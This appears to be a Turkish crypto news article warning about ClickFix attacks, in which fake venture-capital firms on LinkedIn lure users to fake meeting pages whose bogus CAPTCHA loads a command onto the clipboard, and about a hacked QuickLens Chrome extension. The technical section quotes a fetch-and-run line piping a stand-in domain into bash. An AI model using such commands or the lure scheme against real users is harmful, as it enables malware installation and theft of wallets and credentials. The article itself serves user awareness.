ClickFix'in VC Kılığıyla Hacker Tuzağı: Kripto Dünyasını Sarsan Saldırılar
Kripto dünyasında hacker grupları, Moonlock Lab raporunda vurgulanan ClickFix taktiğiyle girişim sermayesi şirketlerini sahteleyerek kullanıcıları kandırıyor. LinkedIn üzerinden SolidBit, MegaBit ve Lumax Capital gibi hayali firmalardan ortaklık mesajları atılıyor, ardından Zoom ile Google Meet'e ait olduğu söylenen sahte bağlantılara kullanıcılar çekiliyor. Bu bağlantılara erişildiğinde, taklit Cloudflare 'Ben robot değilim' doğrulama kutusu beliriyor; kullanıcı tıkladığında zararlı bir kod panoya yapıştırılıyor ve terminale kopyalanıp çalıştırılması teşvik ediliyor. Böylece siber suçlular, güvenlik bariyerlerini kullanıcının kendi eliyle aşmasını sağlıyor. Mykhailo Hureiev imzalı SolidBit kurucu ortağı hesabı bu operasyonda başrolde, fakat altyapı unsurları anında yenileniyor.
Mykhailo Hureiev adlı kullanıcı, dolandırıcılığın LinkedIn aşamasında ana iletişim noktası olarak öne çıkıyor. Kaynak: big dan
QuickLens Eklentisindeki Siber Saldırı İncelemesi
ClickFix furyasının aynı zaman diliminde QuickLens Chrome uzantısı hack'lendi. Annex Security'nin bildirdiğine göre, 7.000'den fazla kullanıcı mağdur oldu: Kripto cüzdan bilgileri, seed phrase'ler ve Gmail hesap şifreleri gasp edildi. Bu eklenti, ClickFix aracılığıyla kötü amaçlı yazılım dağıttı ve Chrome Web Store'dan derhal çekildi.
QuickLens, kötü yazılım yaymak için hack'lendikten sonra web mağazasından kaldırıldı. Kaynak: Annex Security
ClickFix Yönteminin Teknik İşleyişi
Bu saldırı, pano zehirleme prensibi üzerine kurulu. Sahte CAPTCHA'ya basıldığında, panoya 'curl -s https://fake-domain.sh | bash' tarzı bir talimat yükleniyor. Kullanıcı, 'çözüm' adına bunu terminal penceresine aktarıp devreye sokuyor. Bu sayede UAC tipi engeller atlatılıyor, zira işlem kullanıcının iradesiyle gerçekleşiyor. Microsoft Threat Intelligence verilerine göre, son bir yılda üretim, ticaret ve kamu kurumlarında 100'ün üzerinde olay kaydedildi.
Sahte LinkedIn Profilleri ve Mykhailo Hureiev'in Etkisi
SolidBit'in sözde kurucu ortağı Mykhailo Hureiev profili üzerinden davetiyeler saçılıyor. Saldırgan ekipler, IP adreslerini ve alan adlarını saniyeler içinde dönüştürerek takibi imkansız kılıyor. LinkedIn'deki doğrulama zaafı, kripto uzmanlarını kolay av yapıyor. Bu numaralar, SEED detayli analiz benzeri projelerde seed phrase gaspına neden oluyor.
ClickFix Saldırılarının Sektörel Dağılımı
| Sektör | Raporlanan Kullanım | Kaynak |
|---|---|---|
| Üretim | Yaygın | Unit42 |
| Perakende | Orta | Microsoft TI |
| Hükümet | Düşük | Unit42 |
| Kripto | Yükselen | Moonlock Lab |
SEED Token Sahipleri İçin ClickFix Tehlikesi
SEED benzeri varlıklarda seed phrase ele geçirilmesi, bütün varlıkların yok olmasına yol açıyor. Hackerlar, VC kılığına bürünerek SEED vadeli işlemler tutkunlarını tuzağa düşürüyor. Önlemler: 2FA'yı aktif hale getirin, seed'leri donanım cüzdanlara aktarın, LinkedIn davetlerini sorgulayın ve pano denetleyicileri edinin (örneğin CleanClip).
Bu Tür Saldırılardan Korunma Yöntemleri
- Şüpheli bağlantılara dokunmayın; domain'leri resmi kaynaklardan teyit edin.
- Terminal emirlerini incelemeden çalıştırmayın.
- Uzantıları sadece güvenilir mağazalardan indirin ve yetkileri kısıtlayın.
- Kripto camiasında doğrulama kurallarını uygulayın.